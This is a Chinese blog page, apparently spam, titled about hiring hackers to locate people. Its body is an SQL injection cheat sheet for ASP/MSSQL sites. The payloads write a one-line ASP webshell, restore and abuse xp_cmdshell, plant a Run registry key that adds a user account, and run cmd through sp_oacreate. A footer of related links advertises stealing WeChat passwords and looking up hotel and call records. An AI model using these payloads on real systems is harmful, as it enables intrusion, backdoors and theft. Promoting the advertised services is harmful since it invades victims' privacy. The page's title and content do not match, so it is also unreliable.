找黑客追-黑客如何定位别人的位置(如何通过 *** 定位别人的位

访客4年前黑客文章814

1、用^转义字符来写ASP(一句话木马)文件的 *** :
?http://192.168.1.5/display.asp?keyno=1881;execmaster.dbo.xp_cmdshell'echo^executerequest^(l^)^^>>c:\mu.asp';--

?echo^<%execute^(request^(l^)^)%^>>c:\mu.asp

2、显示SQL系统版本:
?http://192.168.1.5/display.asp?keyno=188and1=(select@@VERSION)
?http://www.xxxx.com/FullStory.asp?id=1and1=convert(int,@@version)--

MicrosoftVBScript编译器错误错误'800a03f6'
缺少'End'
/iisHelp/common/500-100.asp,行242
MicrosoftOLEDBProviderforODBCDrivers错误'80040e07'
[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue'MicrosoftSQLServer2000-8.00.760(IntelX86)Dec17200214:22:05Copyright(c)1988-2003MicrosoftCorporationDesktopEngineonWindowsNT5.0(Build2195:ServicePack4)'toacolumnofdatatypeint.
/display.asp,行17
3、在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用“in”关键字进行查询,例如“select*frommytablewhereidin(1)”,括号中的值就是我们提交的数据,它的结果与使用“select*frommytablewhereid=1”的查询结果完全相同。所以访问页面的时候在URL后面加上“)and1=1and1in(1”后原来的SQL语句就变成了“select*frommytablewhereidin(1)and1=1and1in(1)”,这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为“包含数字型”吧,聪明的你一定想到了还有“包含字符型”呢。对了,它就是由于类似“select*frommytablewherenamein('firstsee')”的查询语句造成的。

4、判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188and1=(selectcount(*)FROMmaster.dbo.sysobjectswherextype='X'ANDname='xp_cmdshell')
恢复xp_cmdshell扩展存储的命令:
http://www.test.com/news/show1.asp?NewsId=125272
;execmaster.dbo.sp_addextendedproc'xp_cmdshell','e:\inetput\web\xplog70.dll';--

5、向启动组中写入命令行和执行程序:
http://192.168.1.5/display.asp?keyno=188;EXECmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe/cnetusertestptlove/add'


6、查看当前的数据库名称:
?http://192.168.1.5/display.asp?keyno=188and0<>db_name(n)n改成0,1,2,3……就可以跨库了
?http://www.xxxx.com/FullStory.asp?id=1and1=convert(int,db_name())--
MicrosoftVBScript编译器错误错误'800a03f6'
缺少'End'
/iisHelp/common/500-100.asp,行242
MicrosoftOLEDBProviderforODBCDrivers错误'80040e07'
[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue'huidahouse'toacolumnofdatatypeint.
/display.asp,行17
7、列出当前所有的数据库名称:
select*frommaster.dbo.sysdatabases列出所有列的记录
selectnamefrommaster.dbo.sysdatabases仅列出name列的记录

8、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令:
createTABLEmytmp(infoVARCHAR(400),IDintIDENTITY(1,1)NOTNULL)
DECLARE@shellINT
DECLARE@fsoINT
DECLARE@fileINT
DECLARE@isEndBIT
DECLARE@outVARCHAR(400)
EXECsp_oacreate'wscript.shell',@shelloutput
EXECsp_oamethod@shell,'run',null,'cmd.exe/cdirc:\>c:\temp.txt','0','true'
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。

EXECsp_oacreate'scripting.filesystemobject',@fsooutput
EXECsp_oamethod@fso,'opentextfile',@fileout,'c:\temp.txt'
--因为fso的opentextfile *** 将返回一个textstream对象,所以此时@file是一个对象令牌

相关文章

酒店住宿记录公安局保留多久(宾馆登记信息可以随便查吗)

酒店住宿记录公安局保留多久(宾馆登记信息可以随便查吗)专业盗取微信密码,开房查询,通话记录查询,查询微信聊天记录,非常靠谱!旅行时最重要的是选择一家成本效益高的酒店,这不仅会让我们感觉更好,还能让我们...

世界上海拔最低的湖泊是什么?今天521蚂蚁庄园课堂答案

世界上海拔最低的湖泊是什么?今天521蚂蚁庄园课堂答案

蚂蚁庄园课堂在5月21日的问题中有一个问题就是世界上海拔最低的湖泊是什么?还有不知道答案是什么的小伙伴们赶紧来看看答案介绍吧! 5月21日蚂蚁庄园课堂答案 问题:小鸡宝宝考考你,世界上海拔最低...

眼睫毛怎么变长?快速增长的方法

眼睫毛怎么变长?快速增长的方法

又长又浓的睫毛能给眼睛加分不少,每个爱美女生都希望拥有纤长浓密的睫毛,可是天生睫毛短而稀怎么办?怎样让眼睫毛自然变长?下面小编给大家介绍7种天然增长睫毛的方法,只要坚持,你也可以拥有长睫毛! 怎...

怎样不花钱优化网站?简单5招教你驱动网站流量

怎样不花钱优化网站?简单5招教你驱动网站流量

奈何不费钱优化网站?简朴5招教你驱动网站流量 值得一看 只要互联网存在,网站就会存在。因为网站已经成为互联网用户表达本身、提供信息、甚至共享文件和媒体的处所。网站的机动性使其成为推广内容和晋升差异范例...

李佳琦小助理转幕后做合伙人怎么回事 以后还会出现在直播间么

李佳琦小助理转幕后做合伙人怎么回事 以后还会出现在直播间么

【李佳琦小助理转幕后做合伙人】6日,李佳琦在直播中宣布,经过他本人、公司及李佳琦的小助理付鹏的郑重考虑,决定其成为公司合伙人,参与幕后工作,此后不会出现在直播间。 恭喜!李佳琦小助理转幕后做合伙...

找黑客改大学的资料,黑客开外挂网站

一、改大学的资料怎么找黑客 1、QQ怎么群黑客如果你想成为一个可怕的客户阅读ALT2600新闻集团,当你发现自己并不像你想象的那么聪明时,你会进入5到10个监狱。改大学的资料攻击黑客们建造了英特尼。接...